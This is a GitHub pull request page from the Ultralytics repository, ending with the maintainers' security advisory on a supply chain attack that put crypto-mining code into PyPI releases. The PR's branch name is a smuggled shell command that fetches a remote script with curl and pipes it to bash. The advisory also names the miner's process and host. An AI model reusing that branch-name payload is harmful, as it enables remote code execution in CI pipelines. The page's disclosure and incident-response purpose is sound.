Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

docs: readme #18018

Closed
wants to merge 0 commits into from
Closed

docs: readme #18018

wants to merge 0 commits into from
+0 βˆ’0

Conversation

openimbot
Copy link

@openimbot openimbot commented Dec 4, 2024
edited by UltralyticsAssistant
Loading

πŸ› οΈ PR Summary

Made with ❀️ by Ultralytics Actions

🌟 Summary

This PR doesn't introduce any new code changes.

πŸ“Š Key Changes

  • None; the diff shows zero modifications.

🎯 Purpose & Impact

  • This PR might be used for testing, documentation updates, or preparing for future changes, but it has no direct impact on the codebase or users at this time. πŸ› οΈ

@UltralyticsAssistant UltralyticsAssistant added the documentation Improvements or additions to documentation label Dec 4, 2024
@UltralyticsAssistant
Copy link
Member

πŸ‘‹ Hello @openimbot, thank you for submitting an ultralytics/ultralytics πŸš€ PR! To ensure a seamless integration of your work, please review the following checklist:

  • βœ… Define a Purpose: Clearly explain the purpose of your fix or feature in your PR description, and link to any relevant issues. Ensure your commit messages are clear, concise, and adhere to the project's conventions.
  • βœ… Synchronize with Source: Confirm your PR is synchronized with the ultralytics/ultralytics main branch. If it's behind, update it by clicking the 'Update branch' button or by running git pull and git merge main locally.
  • βœ… Ensure CI Checks Pass: Verify all Ultralytics Continuous Integration (CI) checks are passing. If any checks fail, please address the issues.
  • βœ… Update Documentation: Ensure your changes align with the project's formatting standards and contribute to the clarity and consistency of the documentation, even for minor updates like this one.
  • βœ… Minimize Changes: Since this PR is a documentation update, it's already following the principle of limited, targeted changesβ€”great job! πŸ‘

For more guidance, please refer to our Contributing Guide, and feel free to leave a comment below if you’re unsure about anything.

Thank you for helping improve Ultralytics' documentation! An Ultralytics engineer will review your PR soon. πŸš€

@openimbot openimbot closed this Dec 4, 2024
@openimbot openimbot force-pushed the $({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash) branch from b83047f to 21162bd Compare December 4, 2024 19:35
@openimbot openimbot deleted the $({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash) branch December 4, 2024 19:35
@ambitious-octopus ambitious-octopus added the Alert Potential spam, abuse, or off-topic. label Dec 5, 2024
@UltralyticsAssistant UltralyticsAssistant removed the documentation Improvements or additions to documentation label Dec 5, 2024
@lazka lazka mentioned this pull request Dec 5, 2024
Closed
@CPlusPatch
Copy link

bro what πŸ’€

@rubin110 rubin110 mentioned this pull request Dec 6, 2024
Closed
1 task
@jhj0517 jhj0517 mentioned this pull request Dec 6, 2024
Closed
@AsherJingkongChen
Copy link

What did the bot do?

@glenn-jocher
Copy link
Member

Security Advisory: Unauthorized Code in PyPI Releases

Summary

Ultralytics has identified a supply chain attack affecting affecting multiple versions of the ultralytics package. The compromised versions contained unauthorized code that downloaded and executed cryptocurrency mining software when instantiating YOLO models. This code was injected into the PyPI release artifacts and was not present in the public GitHub repository.

Technical Details

The unauthorized code performed the following actions:

  1. Detected user system architecture
  2. Downloaded cryptocurrency mining binaries from GitHub blob storage
  3. Executed the mining software as a subprocess

Affected binaries were hosted at:

  • Linux x86: 665bb8add8c21d28a961fe3f93c12b249df10787
  • MacOS arm64: 5e67b0e4375f63eb6892b33b1f98e900802312c2

The malicious process manifested as /tmp/ultralytics_runner and attempted connections to connect.consrensys.com:8080.

Impact

All users who installed and ran affected versions from PyPI were potentially affected. The malicious code was activated upon YOLO model initialization. Source installations from GitHub were not affected.

Affected Versions

  • Compromised PyPI versions: 8.3.41, 8.3.42, 8.3.45, 8.3.46
  • Clean versions: >=8.3.47

Mitigation

  1. Immediately upgrade to version 8.3.47 or later
  2. Check for and terminate any unexpected processes named ultralytics_runner
  3. Remove any suspicious files in the /tmp directory (on Unix-based systems)

Resolution

We have:

  • Removed all affected versions from PyPI
  • Released clean version 8.3.47
  • Secured our PyPI publishing workflow
  • Initiated investigation into our build pipeline
  • Implementing additional security measures for future releases

Additional Information

This incident appears to be a sophisticated supply chain attack that bypassed PyPI provenance signing. We are conducting a thorough investigation and implementing enhanced security measures to prevent similar incidents.

@ultralytics ultralytics locked as resolved and limited conversation to collaborators Dec 7, 2024
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
Alert Potential spam, abuse, or off-topic.
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
6 participants
@openimbot @UltralyticsAssistant @CPlusPatch @AsherJingkongChen @glenn-jocher @ambitious-octopus